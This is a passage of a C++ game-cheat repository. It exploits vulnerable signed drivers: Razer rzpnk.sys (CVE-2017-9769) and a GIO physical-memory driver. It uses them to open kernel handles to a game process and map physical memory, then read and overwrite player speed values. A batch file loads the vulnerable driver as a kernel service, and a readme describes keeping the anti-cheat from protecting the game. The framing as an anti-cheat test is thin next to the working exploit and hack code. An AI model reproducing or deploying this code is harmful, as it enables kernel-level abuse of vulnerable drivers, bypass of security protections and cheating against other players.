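    static _fn_memcpy fn_memcpy;
    static _fn_mapPhysical fn_mapPhysical;
    static _fn_unmapPhysical fn_unmapPhysical;
    static uintptr_t DTBTargetProcess;
    static uintptr_t virtualSizeTargetProcess;
    static uintptr_t pBaseAddressTargetProcess;

    // Developed for DriverReader (ReClass Plugin)
    static uintptr_t pVadRootTargetProcess;
    static uintptr_t pPEBTargetProcess;
    static std::vector<EnumerateRemoteSectionData> sections;
    static std::vector<EnumerateRemoteModuleData> modules;

private:

};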
-------------------------------------------------------------------------------- /DriverHelper/DriverHelper.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | 15.0 23 | {36244BA2-D910-4746-8ED2-7CFA55FB4DE9} 24 | Win32Proj 25 | DriverHelper 26 | 10.0.17763.0 27 | 28 | 29 | 30 | StaticLibrary 31 | true 32 | v141 33 | Unicode 34 | 35 | 36 | StaticLibrary 37 | false 38 | v141 39 | true 40 | Unicode 41 | 42 | 43 | StaticLibrary 44 | true 45 | v141 46 | MultiByte 47 | 48 | 49 | StaticLibrary 50 | false 51 | v141 52 | true 53 | MultiByte 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | true 75 | 76 | 77 | true 78 | 79 | 80 | false 81 | 82 | 83 | false 84 | 85 | 86 | 87 | NotUsing 88 | Level3 89 | Disabled 90 | true 91 | _DEBUG;_LIB;%(PreprocessorDefinitions) 92 | true 93 | $(SolutionDir)DriverHelper;%(AdditionalIncludeDirectories) 94 | 95 | 96 | Windows 97 | true 98 | 99 | 100 | 101 | 102 | NotUsing 103 | Level3 104 | Disabled 105 | true 106 | WIN32;_DEBUG;_LIB;%(PreprocessorDefinitions) 107 | true 108 | 109 | 110 | Windows 111 | true 112 | 113 | 114 | 115 | 116 | Use 117 | Level3 118 | MaxSpeed 119 | true 120 | true 121 | true 122 | WIN32;NDEBUG;_LIB;%(PreprocessorDefinitions) 123 | true 124 | 125 | 126 | Windows 127 | true 128 | true 129 | true 130 | 131 | 132 | 133 | 134 | NotUsing 135 | Level3 136 | MaxSpeed 137 | true 138 | true 139 | true 140 | _CRT_SECURE_NO_WARNINGS;NDEBUG;_LIB;%(PreprocessorDefinitions) 141 | true 142 | 143 | 144 | Windows 145 | true 146 | true 147 | true 148 | 149 | 150 | 151 | 152 | 153 | 154 | 155 | 156 | 157 | 158 | Create 159 | Create 160 | Create 161 | Create 162 | 163 | 164 | 165 | 166 | 167 | 168 | 169 | 170 | -------------------------------------------------------------------------------- 
/DriverHelper/DriverHelper.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Header Files 20 | 21 | 22 | Header Files 23 | 24 | 25 | Header Files 26 | 27 | 28 | 29 | 30 | Source Files 31 | 32 | 33 | Source Files 34 | 35 | 36 | 37 | 38 | 39 | -------------------------------------------------------------------------------- /DriverHelper/Readme.md: -------------------------------------------------------------------------------- 1 | # DriverHelper 2 | 3 | ## Introduction 4 | 5 | 6 | ## Usage 7 | 8 | This module provides all key features required to exploit and communicate with a Driver. 
9 | 10 | ## Key Features 11 | 12 | Class DriverHelper will provide the following methods: 13 | 14 | - static int memmem(PBYTE haystack, DWORD haystack_size, PBYTE needle, DWORD needle_size); 15 | - static int getDeviceHandle(LPTSTR name); 16 | - static unsigned __int64 __fastcall ExpLookupHandleTableEntryW7(__int64 HandleTable, unsigned __int64 handle); 17 | - static unsigned __int64 __fastcall ExpLookupHandleTableEntryW10(__int64 HandleTable, __int64 handle); 18 | - static ULONG64 findPhisical_ObjectTable(DWORDLONG startAddress, DWORDLONG stopAddress, DWORD searchSpace, PBYTE searchBuffer, DWORD bufferSize); 19 | - static DWORDLONG findPhisical(DWORDLONG startAddress, DWORDLONG stopAddress, DWORD searchSpace, PBYTE searchBuffer, DWORD bufferSize); 20 | 21 | 22 | ## Useful Structures: 23 | 24 | EPROCESS pattern: 25 | ``` 26 | typedef struct { 27 | CHAR ImageFileName[15]; 28 | DWORD PriorityClass; 29 | } _EPROCESS_PATTERN; 30 | ``` 31 | 32 | Read physicalAddress: 33 | ``` 34 | typedef struct _READ_REQUEST { 35 | DWORD InterfaceType; 36 | DWORD Bus; 37 | ULONG64 PhysicalAddress; 38 | DWORD IOSpace; 39 | DWORD size; 40 | } READ_REQUEST; 41 | ``` 42 | 43 | Write physicalAddress: 44 | ``` 45 | typedef struct _WRITE_REQUEST { 46 | DWORDLONG address; 47 | DWORD length; 48 | DWORDLONG buffer; 49 | } WRITE_REQUEST; 50 | ``` 51 | 52 | Structure for memcpy using VA: 53 | ``` 54 | typedef struct _MEMCPY_REQUEST { 55 | ULONG64 dest; 56 | ULONG64 src; 57 | DWORD size; 58 | } MEMCPY_REQUEST; 59 | ``` 60 | 61 | HANDLE_TABLE_ENTRY: 62 | ``` 63 | typedef struct _HANDLE_TABLE_ENTRY 64 | { 65 | ULONGLONG Value; 66 | ULONGLONG GrantedAccess : 25; 67 | } HANDLE_TABLE_ENTRY, *PHANDLE_TABLE_ENTRY; 68 | ``` 69 | 70 | HANDLE_TABLE: 71 | ``` 72 | typedef struct _HANDLE_TABLE 73 | { 74 | CHAR fill[100]; 75 | } HANDLE_TABLE, *PHANDLE_TABLE; 76 | ``` -------------------------------------------------------------------------------- /DriverHelper/stdafx.cpp: 
-------------------------------------------------------------------------------- 1 | #include "stdafx.h" 2 | -------------------------------------------------------------------------------- /DriverHelper/stdafx.h: -------------------------------------------------------------------------------- 1 | // stdafx.h : include file for standard system include files, 2 | // or project specific include files that are used frequently, but 3 | // are changed infrequently 4 | // 5 | 6 | #pragma once 7 | 8 | #include "targetver.h" 9 | 10 | #define WIN32_LEAN_AND_MEAN // Exclude rarely-used stuff from Windows headers 11 | 12 | 13 | 14 | // reference additional headers your program requires here 15 | -------------------------------------------------------------------------------- /DriverHelper/targetver.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | // Including SDKDDKVer.h defines the highest available Windows platform. 4 | 5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and 6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h. 7 | 8 | #include 9 | -------------------------------------------------------------------------------- /DriverTester/DriverTester.cpp: -------------------------------------------------------------------------------- 1 | // DriverTester.cpp : This file contains the 'main' function. Program execution begins and ends there. 
2 | // 3 | 4 | #include "pch.h" 5 | #include 6 | #include "CheatHelper.h" 7 | #include 8 | #include 9 | 10 | #pragma comment(lib, "ntdll.lib") 11 | 12 | DWORD targetPid = NULL; 13 | PipeMessageRequest PMRequest; 14 | PipeMessageResponse PMResponse; 15 | 16 | typedef NTSTATUS(WINAPI *fn_NtDeviceIoControlFile)( 17 | __in HANDLE FileHandle, 18 | __in HANDLE Event, 19 | __in PIO_APC_ROUTINE ApcRoutine, 20 | __in PVOID ApcContext, 21 | __out PIO_STATUS_BLOCK IoStatusBlock, 22 | __in ULONG IoControlCode, 23 | __in PVOID InputBuffer, 24 | __in ULONG InputBufferLength, 25 | __out PVOID OutputBuffer, 26 | __in ULONG OutputBufferLength 27 | ); 28 | 29 | fn_NtDeviceIoControlFile NtDeviceIoControlFileInstance; 30 | 31 | struct buffer { 32 | INT64 pid1; 33 | INT64 pid2; 34 | } inB, outB; 35 | 36 | HANDLE hTarget = NULL; 37 | 38 | 39 | bool ExploitRazerDriver() { 40 | HANDLE hDevice = CreateFile("\\\\.\\47CD78C9-64C3-47C2-B80F-677B887CF095", FILE_SHARE_WRITE | FILE_SHARE_READ, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); 41 | if (hDevice == INVALID_HANDLE_VALUE) 42 | { 43 | std::cout << "INVALID_HANDLE_VALUE: " << GetLastError() << std::endl; 44 | return 1; 45 | } 46 | 47 | 48 | HANDLE targetHandle = NULL; 49 | 50 | HMODULE hNtDll = GetModuleHandleW(L"ntdll.dll"); 51 | if (hNtDll == NULL) 52 | { 53 | std::cout << "GetModuleHandleW!\n"; 54 | } 55 | 56 | NtDeviceIoControlFileInstance = (fn_NtDeviceIoControlFile)GetProcAddress(hNtDll, "NtDeviceIoControlFile"); 57 | 58 | DWORD returnedBytes = 0; 59 | memset(&inB, 0, sizeof(buffer)); 60 | memset(&outB, 0, sizeof(buffer)); 61 | inB.pid1 = targetPid; 62 | 63 | DeviceIoControl(hDevice, 0x22a050, &inB, sizeof(buffer), &outB, sizeof(buffer), &returnedBytes, NULL); 64 | if (returnedBytes == 0) 65 | { 66 | std::cout << "[-] Exploit failed: " << std::hex << GetLastError() << std::endl; 67 | }; 68 | 69 | std::cout << "[+] Target process PID: " << std::hex << outB.pid1 << std::endl; 70 | std::cout << "[+] Target handle: " << std::hex 
<< outB.pid2 << std::endl; 71 | hTarget = (HANDLE)outB.pid2; 72 | return 0; 73 | } 74 | 75 | 76 | 77 | void handleTests(HANDLE handle) 78 | { 79 | SIZE_T stRead = 0; 80 | SIZE_T stWrite = 0; 81 | 82 | PMRequest.action = 1; 83 | CheatHelper::prepareRequest(PMRequest); 84 | 85 | CheatHelper::RPM((HANDLE)handle, (LPCVOID)PMRequest.address, PMResponse.buffer, PMRequest.size, NULL); 86 | 87 | PMRequest.action = 2; 88 | CheatHelper::prepareRequest(PMRequest); 89 | 90 | CheatHelper::WPM((HANDLE)handle, (LPVOID)PMRequest.address, PMRequest.buffer, PMRequest.size, NULL); 91 | 92 | PMRequest.action = 4; 93 | CheatHelper::prepareRequest(PMRequest); 94 | 95 | CheatHelper::NtRVM((HANDLE)handle, (LPVOID)PMRequest.address, PMResponse.buffer, PMRequest.size, NULL); 96 | 97 | 98 | PMRequest.action = 5; 99 | CheatHelper::prepareRequest(PMRequest); 100 | 101 | CheatHelper::NtWVM((HANDLE)handle, (LPVOID)PMRequest.address, PMRequest.buffer, PMRequest.size, NULL); 102 | 103 | PMRequest.action = 6; 104 | CheatHelper::prepareRequest(PMRequest); 105 | CheatHelper::ZwRVM((HANDLE)handle, (LPVOID)PMRequest.address, PMRequest.buffer, PMRequest.size, NULL); 106 | 107 | PMRequest.action = 7; 108 | CheatHelper::prepareRequest(PMRequest); 109 | CheatHelper::ZwWVM((HANDLE)handle, (LPVOID)PMRequest.address, PMRequest.buffer, PMRequest.size, NULL); 110 | 111 | 112 | } 113 | 114 | 115 | 116 | int main() 117 | { 118 | 119 | std::cout << "[+] Init\n"; 120 | CheatHelper::loadConfig(); 121 | 122 | std::cout << "[+] Waiting for target process\n"; 123 | while (true) 124 | { 125 | targetPid = CheatHelper::GetProcId(CheatHelper::targetProc); 126 | if (targetPid != NULL) 127 | { 128 | std::cout << "[+] PID: 0x" << std::dec << targetPid << std::endl; 129 | break;// 130 | } 131 | Sleep(1000); 132 | } 133 | 134 | PMRequest.address = 0x0; 135 | SecureZeroMemory(PMRequest.buffer, BUFSIZE - 1); 136 | PMRequest.size = 0x0; 137 | // Connecting the vulnerable driver (Razer Synapse rzpnk.sys ZwOpenProcess - 
ZwOpenProcess) 138 | ExploitRazerDriver(); 139 | 140 | handleTests(hTarget); 141 | } 142 | 143 | // Run program: Ctrl + F5 or Debug > Start Without Debugging menu 144 | // Debug program: F5 or Debug > Start Debugging menu 145 | 146 | // Tips for Getting Started: 147 | // 1. Use the Solution Explorer window to add/manage files 148 | // 2. Use the Team Explorer window to connect to source control 149 | // 3. Use the Output window to see build output and other messages 150 | // 4. Use the Error List window to view errors 151 | // 5. Go to Project > Add New Item to create new code files, or Project > Add Existing Item to add existing code files to the project 152 | // 6. In the future, to open this project again, go to File > Open > Project and select the .sln file 153 | -------------------------------------------------------------------------------- /DriverTester/DriverTester.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | 15.0 23 | {D3FF3C48-32D5-4B7A-83EA-22DFE29B5E11} 24 | Win32Proj 25 | DriverTester 26 | 10.0.17763.0 27 | 28 | 29 | 30 | Application 31 | true 32 | v141 33 | Unicode 34 | 35 | 36 | Application 37 | false 38 | v141 39 | true 40 | Unicode 41 | 42 | 43 | Application 44 | true 45 | v141 46 | MultiByte 47 | 48 | 49 | Application 50 | false 51 | v141 52 | true 53 | MultiByte 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | true 75 | $(VC_IncludePath);$(WindowsSDK_IncludePath); 76 | 77 | 78 | true 79 | 80 | 81 | false 82 | 83 | 84 | false 85 | 86 | 87 | 88 | NotUsing 89 | Level3 90 | Disabled 91 | true 92 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 93 | true 94 | pch.h 95 | $(SolutionDir)CheatHelper;%(AdditionalIncludeDirectories) 96 | 97 | 98 | Console 99 | true 100 | $(VCInstallDir)lib;C:\Program Files 
(x86)\Microsoft Visual Studio\2017\Community\VC\Tools\MSVC\14.16.27023\lib\onecore\x64;%(AdditionalLibraryDirectories); 101 | 102 | 103 | 104 | 105 | NotUsing 106 | Level3 107 | Disabled 108 | true 109 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 110 | true 111 | pch.h 112 | $(SolutionDir)CheatHelper;%(AdditionalIncludeDirectories) 113 | 114 | 115 | Console 116 | true 117 | 118 | 119 | 120 | 121 | Use 122 | Level3 123 | MaxSpeed 124 | true 125 | true 126 | true 127 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 128 | true 129 | pch.h 130 | 131 | 132 | Console 133 | true 134 | true 135 | true 136 | 137 | 138 | 139 | 140 | NotUsing 141 | Level3 142 | MaxSpeed 143 | true 144 | true 145 | true 146 | _CRT_SECURE_NO_WARNINGS;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 147 | true 148 | pch.h 149 | $(SolutionDir)CheatHelper;%(AdditionalIncludeDirectories) 150 | 151 | 152 | Console 153 | true 154 | true 155 | true 156 | 157 | 158 | 159 | 160 | 161 | 162 | 163 | 164 | Create 165 | Create 166 | Create 167 | Create 168 | 169 | 170 | 171 | 172 | 173 | 174 | 175 | 176 | {a080c117-d1db-4671-8217-65496573ba4d} 177 | 178 | 179 | 180 | 181 | 182 | -------------------------------------------------------------------------------- /DriverTester/DriverTester.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Header Files 20 | 21 | 22 | 23 | 24 | Source Files 25 | 26 | 27 | Source Files 28 | 29 | 30 | 31 | 32 | Source Files 33 | 34 | 35 | 36 | -------------------------------------------------------------------------------- /DriverTester/LoadDriver.bat: 
-------------------------------------------------------------------------------- 1 | sc create DriverTester binpath= "..\resources\rzpnk.sys" type= kernel 2 | sc start DriverTester -------------------------------------------------------------------------------- /DriverTester/Readme.md: -------------------------------------------------------------------------------- 1 | # DriverTester 2 | 3 | ## Introduction 4 | Test case for anti-cheat evaluation: it checks whether a handle to the game that was opened through a vulnerable third-party driver can be used to read and write the game's memory. The driver load in LoadDriver.bat (a kernel-mode service created with `sc`) is the step a defender can observe or block first. 5 | 6 | ## Usage 7 | 8 | This module exploits **Razer Synapse rzpnk.sys (2.20.15.1104) - CVE-2017-9769** to open a new HANDLE to the game from kernel mode. It then attempts to access the game's memory using this handle. 9 | 10 | > A specially crafted IOCTL can be issued to the rzpnk.sys driver in Razer Synapse 2.20.15.1104 that is forwarded to ZwOpenProcess allowing a handle to be opened to an arbitrary process. 11 | References 12 | 13 | __Actions that this module attempts:__ 14 | 15 | - ReadProcessMemory 16 | - WriteProcessMemory 17 | - ntReadVirtualMemory 18 | - ntWriteVirtualMemory 19 | - ZwReadVirtualMemory 20 | - ZwWriteVirtualMemory 21 | 22 | ## Configuration 23 | 24 | This module requires configuration: 25 | 26 | - The following variables in config.ini need to be provided: 27 | 28 | [Addresses] 29 | ``` 30 | RPMAddressHigh=0x1 31 | RPMAddressLow=0x58A60000 32 | RPMAddress=0x0 33 | WPMAddressHigh=0x00000000 34 | WPMAddressLow=0x58A60000 35 | WPMAddress=0x0 36 | ntRVMAddressHigh=0x00000000 37 | ntRVMAddressLow=0x58A60000 38 | ntRVMAddress=0x0 39 | ntWVMAddressHigh=0x00000000 40 | ntWVMAddressLow=0x58A60000 41 | ntWVMAddress=0x0 42 | ZwRVMAddressHigh=0x00000000 43 | ZwRVMAddressLow=0x58A60000 44 | ZwRVMAddress=0x0 45 | ZwWVMAddressHigh=0x00000000 46 | ZwWVMAddressLow=0x58A60000 47 | ZwWVMAddress=0x0 48 | ``` 49 | 50 | 51 | [Buffers] 52 | ``` 53 | #SIZE MUST BE SIZE+1 54 | RPMBuffer=TTTT1 55 | RPMBufferSize=0x6 56 | WPMBuffer=TTTT2 57 | WPMBufferSize=0x6 58 | ntRVMBuffer=TTTT4 59 | ntRVMBufferSize=0x6 60 | ntWVMBuffer=TTTT5 61 | 
ntWVMBufferSize=0x6 62 | ZwRVMBuffer=TTTT6 63 | ZwRVMBufferSize=0x6 64 | ZwWVMBuffer=TTTT7 65 | ZwWVMBufferSize=0x6 66 | ``` 67 | 68 | [Strings] 69 | ``` 70 | targetProc=r5apex.exe 71 | ``` 72 | 73 | ## Combination with other techniques 74 | 75 | - **RUNASKINVOKER**: By executing the game using this options we will prevent the Anti-cheat to fully protect the game end load the driver. 76 | 77 | 78 | ## Links 79 | 80 | https://warroom.rsmus.com/cve-2017-9769/ -------------------------------------------------------------------------------- /DriverTester/pch.cpp: -------------------------------------------------------------------------------- 1 | // pch.cpp: source file corresponding to pre-compiled header; necessary for compilation to succeed 2 | 3 | #include "pch.h" 4 | 5 | // In general, ignore this file, but keep it around if you are using pre-compiled headers. 6 | -------------------------------------------------------------------------------- /DriverTester/pch.h: -------------------------------------------------------------------------------- 1 | // Tips for Getting Started: 2 | // 1. Use the Solution Explorer window to add/manage files 3 | // 2. Use the Team Explorer window to connect to source control 4 | // 3. Use the Output window to see build output and other messages 5 | // 4. Use the Error List window to view errors 6 | // 5. Go to Project > Add New Item to create new code files, or Project > Add Existing Item to add existing code files to the project 7 | // 6. 
In the future, to open this project again, go to File > Open > Project and select the .sln file 8 | 9 | #ifndef PCH_H 10 | #define PCH_H 11 | 12 | // TODO: add headers that you want to pre-compile here 13 | 14 | #endif //PCH_H 15 | -------------------------------------------------------------------------------- /ExternalCheatDriver/ExternalCheatDriver.cpp: -------------------------------------------------------------------------------- 1 | // ExternalCheatDriver.cpp : This file contains the 'main' function. Program execution begins and ends there. 2 | // 3 | // Review summary: test program that reads and writes two values in the process named by CheatHelper::targetProc, after installing the GIO_* IOCTL wrappers below as DriverHelper callbacks. 4 | #include "pch.h" 5 | #include 6 | #include "CheatHelper.h" 7 | #include "DriverHelper.h" 8 | #include 9 | #include 10 | #include 11 | #include 12 | 13 | 14 | // NOTE(review): only the IOCTL_GIO_* codes are referenced in this file; the GPCIDrv64 codes and the kernel offsets below are defined but not used here. 15 | // Definition of IOCTL numbers 16 | // GPCIDrv64 Driver 17 | #define IOCTL_MAPPHYSICAL 0x9C402580 18 | #define IOCTL_UNMAPPHYSICAL 0x9C402584 19 | // GIO Driver 20 | #define IOCTL_GIO_MAPPHYSICAL 0xC3502004 21 | #define IOCTL_GIO_UNMAPPHYSICAL 0xC3502008 22 | #define IOCTL_GIO_MEMCPY 0xC3502808 23 | 24 | // Kernel offsets 25 | // W10 26 | #define OFFSET_IMAGEFILENAME 0x450 27 | #define OFFSET_OBJECTTABLE 0x418 28 | 29 | #pragma comment(lib, "ntdll.lib") 30 | 31 | // Issues IOCTL_GIO_MAPPHYSICAL for the given physical address and size and returns outbuffer[0]. The DeviceIoControl result is not checked, so after a failed call the function returns whatever is in the zero-initialised buffer. 32 | ULONG64 GIO_mapPhysical(ULONG64 physicaladdress, DWORD size) 33 | { 34 | READ_REQUEST inbuffer = { 0, 0, physicaladdress, 0, size }; 35 | ULONG64 outbuffer[2] = { 0 }; 36 | DWORD bytes_returned = 0; 37 | DeviceIoControl(DriverHelper::hDeviceDrv, 38 | IOCTL_GIO_MAPPHYSICAL, 39 | &inbuffer, 40 | sizeof(inbuffer), 41 | &outbuffer, 42 | sizeof(outbuffer), 43 | &bytes_returned, 44 | (LPOVERLAPPED)NULL); 45 | 46 | return outbuffer[0]; 47 | } 48 | // Issues IOCTL_GIO_UNMAPPHYSICAL for the given address and returns outbuffer[0]; the DeviceIoControl result is likewise not checked. 49 | ULONG64 GIO_unmapPhysical(ULONG64 address) 50 | { 51 | ULONG64 inbuffer = address; 52 | ULONG64 outbuffer[2] = { 0 }; 53 | DWORD bytes_returned = 0; 54 | DeviceIoControl(DriverHelper::hDeviceDrv, 55 | IOCTL_GIO_UNMAPPHYSICAL, 56 | (LPVOID)&inbuffer, 57 | sizeof(inbuffer), 58 | (LPVOID)outbuffer, 59 | sizeof(outbuffer), 60 | &bytes_returned, 
61 | (LPOVERLAPPED)NULL); 62 | 63 | return outbuffer[0]; 64 | } 65 | // Issues IOCTL_GIO_MEMCPY with {dest, src, size}; returns TRUE only when the call reported a non-zero byte count, and ignores DeviceIoControl's own BOOL result. 66 | BOOL GIO_memcpy(ULONG64 dest, ULONG64 src, DWORD size) 67 | { 68 | MEMCPY_REQUEST mystructIn = { dest, src, size }; 69 | BYTE outbuffer[0x30] = { 0 }; 70 | DWORD returned = 0; 71 | 72 | DeviceIoControl(DriverHelper::hDeviceDrv, IOCTL_GIO_MEMCPY, (LPVOID)&mystructIn, sizeof(mystructIn), (LPVOID)outbuffer, sizeof(outbuffer), &returned, NULL); 73 | if (returned) { 74 | return TRUE; 75 | } 76 | return FALSE; 77 | } 78 | // True until the first call to ActivateHack has returned successfully. 79 | bool bFirstActivation = true; 80 | // activate != 0: on the first call reads the two current values into initialSpeed/initialAttackSpeed, then writes fixed values to both addresses. activate == 0: logs the current values and writes the saved initial values back. Returns false as soon as one read or write fails. 81 | bool ActivateHack(uintptr_t speedAddress, uintptr_t attackSpeedAddress, boolean activate, int32_t &initialSpeed, int32_t &initialAttackSpeed) 82 | { 83 | if (activate) 84 | { 85 | if (bFirstActivation) 86 | { 87 | std::cout << "[+] Activating Hack" << std::endl; 88 | std::cout << "\t[+] PlayerSpeed Address:\t 0x" << std::hex << speedAddress << std::endl; 89 | std::cout << "\t[+] PlayerAttackSpeed Address:\t 0x" << std::hex << attackSpeedAddress << std::endl; 90 | 91 | if (!DriverHelper::ReadVirtualMemory(DriverHelper::DTBTargetProcess, 92 | speedAddress, 93 | &initialSpeed, sizeof(initialSpeed), NULL)) 94 | { 95 | std::cout << "[-] Reading PlayerSpeed: Failed" << std::endl; 96 | return false; 97 | } 98 | 99 | if (!DriverHelper::ReadVirtualMemory(DriverHelper::DTBTargetProcess, 100 | attackSpeedAddress, 101 | &initialAttackSpeed, sizeof(initialAttackSpeed), NULL)) 102 | { 103 | std::cout << "[-] Reading PlayerAttackSpeed: Failed" << std::endl; 104 | return false; 105 | } 106 | 107 | std::cout << "\t[+] Current PlayerSpeed:\t 0x" << std::hex << initialSpeed << std::endl; 108 | std::cout << "\t[+] Current PlayerAttackSpeed:\t 0x" << std::hex << initialAttackSpeed << std::endl; 109 | } 110 | 111 | int32_t newSpeed = (std::numeric_limits::max)(); 112 | int32_t newAttackSpeed = 9999999; 113 | 114 | if (!DriverHelper::WriteVirtualMemory(DriverHelper::DTBTargetProcess, 115 | speedAddress, 116 | &newSpeed, sizeof(newSpeed), NULL)) 117 | { 118 | 
std::cout << "[-] Activating SpeedHack: Failed" << std::endl; 119 | return false; 120 | } 121 | if (!DriverHelper::WriteVirtualMemory(DriverHelper::DTBTargetProcess, 122 | attackSpeedAddress, 123 | &newAttackSpeed, sizeof(newAttackSpeed), NULL)) 124 | { 125 | std::cout << "[-] Activating AttackSpeedHack: Failed" << std::endl; 126 | return false; 127 | } 128 | // The values logged below are the ones just written; they are not read back from the target. 129 | if (bFirstActivation) 130 | { 131 | std::cout << "\t[+] Current PlayerSpeed:\t 0x" << std::hex << newSpeed << std::endl; 132 | std::cout << "\t[+] Current PlayerAttackSpeed:\t 0x" << std::hex << newAttackSpeed << std::endl; 133 | } 134 | } 135 | else 136 | { 137 | std::cout << "[+] Deactivating Hack" << std::endl; 138 | 139 | int32_t currentSpeed = 0; 140 | int32_t currentAttackSpeed = 0; 141 | 142 | if (!DriverHelper::ReadVirtualMemory(DriverHelper::DTBTargetProcess, 143 | speedAddress, 144 | ¤tSpeed, sizeof(currentSpeed), NULL)) 145 | { 146 | std::cout << "[-] Deactivating SpeedHack: Failed" << std::endl; 147 | return false; 148 | } 149 | if (!DriverHelper::ReadVirtualMemory(DriverHelper::DTBTargetProcess, 150 | attackSpeedAddress, 151 | ¤tAttackSpeed, sizeof(currentAttackSpeed), NULL)) 152 | { 153 | std::cout << "[-] Deactivating AttackSpeedHack: Failed" << std::endl; 154 | return false; 155 | } 156 | 157 | std::cout << "\t[+] Current PlayerSpeed:\t 0x" << std::hex << currentSpeed << std::endl; 158 | std::cout << "\t[+] Current AttackPlayerSpeed:\t 0x" << std::hex << currentAttackSpeed << std::endl; 159 | 160 | if (!DriverHelper::WriteVirtualMemory(DriverHelper::DTBTargetProcess, 161 | speedAddress, 162 | &initialSpeed, sizeof(initialSpeed), NULL)) 163 | { 164 | std::cout << "[-] Deactivating SpeedHack: Failed" << std::endl; 165 | return false; 166 | } 167 | if (!DriverHelper::WriteVirtualMemory(DriverHelper::DTBTargetProcess, 168 | attackSpeedAddress, 169 | &initialAttackSpeed, sizeof(initialAttackSpeed), NULL)) 170 | { 171 | std::cout << "[-] Deactivating AttackSpeedHack: Failed" << std::endl; 172 | 
return false; 173 | } 174 | 175 | std::cout << "\t[+] Current PlayerSpeed:\t 0x" << std::hex << initialSpeed << std::endl; 176 | std::cout << "\t[+] Current AttackPlayerSpeed:\t 0x" << std::hex << initialAttackSpeed << std::endl; 177 | 178 | } 179 | 180 | bFirstActivation = false; 181 | 182 | return true; 183 | } 184 | 185 | // Entry point: loads the config, opens the driver device, installs the GIO_* callbacks, locates the target process, then keeps rewriting the two values every 100 ms until the Insert key is pressed and finally restores them. 186 | int main() 187 | { 188 | std::cout << "[+] Init" << std::endl; 189 | CheatHelper::loadConfig(); 190 | 191 | // NOTE(review): the comment below names GPCIDrv64.sys, but the callbacks installed further down are the GIO_* ones and the Readme sets driverName=\\.\GIO. 192 | // Connecting the vulnerable driver (GPCIDrv64.sys AORUS GRAPHICS ENGINE v1.25) 193 | std::cout << "[+] Obtaining HANDLE to Drv" << std::endl; 194 | if (DriverHelper::getDeviceHandle(CheatHelper::driverName)) 195 | { 196 | std::cout << "[-] Obtaining HANDLE: failed." << std::endl; 197 | return 1; 198 | } 199 | 200 | // If we want to change the driver, we just need to create our functions for communication and set the following variables 201 | DriverHelper::fn_memcpy = (_fn_memcpy)GIO_memcpy; 202 | DriverHelper::fn_mapPhysical = (_fn_mapPhysical)GIO_mapPhysical; 203 | DriverHelper::fn_unmapPhysical = (_fn_unmapPhysical)GIO_unmapPhysical; 204 | 205 | uintptr_t directoryTableBase = 0; 206 | uintptr_t pKProcess = DriverHelper::GetKProcess(directoryTableBase); 207 | 208 | uintptr_t pBaseAddress = DriverHelper::SearchKProcess(CheatHelper::targetProc, directoryTableBase, pKProcess); 209 | 210 | if (!DriverHelper::ObtainKProcessInfo(directoryTableBase, pBaseAddress)) 211 | { 212 | std::cout << "[-] ObtainKProcessInfo failed" << std::endl; 213 | } 214 | // NOTE(review): a failed ObtainKProcessInfo is only logged, and it is called before pBaseAddress is checked for 0 below. 215 | // objectTable 0xcccccccccccccccc unsigned __int64 216 | if (pBaseAddress == 0) 217 | { 218 | std::cout << "[-] Target process not found :(" << std::endl; 219 | return 1; 220 | } 221 | 222 | if (!DriverHelper::CheckProcessHeader(DriverHelper::DTBTargetProcess, 223 | DriverHelper::pBaseAddressTargetProcess)) 224 | { 225 | std::cout << "[-] Failed process header checking" << std::endl; 226 | return 1; 227 | } 228 | 229 | std::cout << "[+] Process Header Check: SUCCESS" << std::endl; 
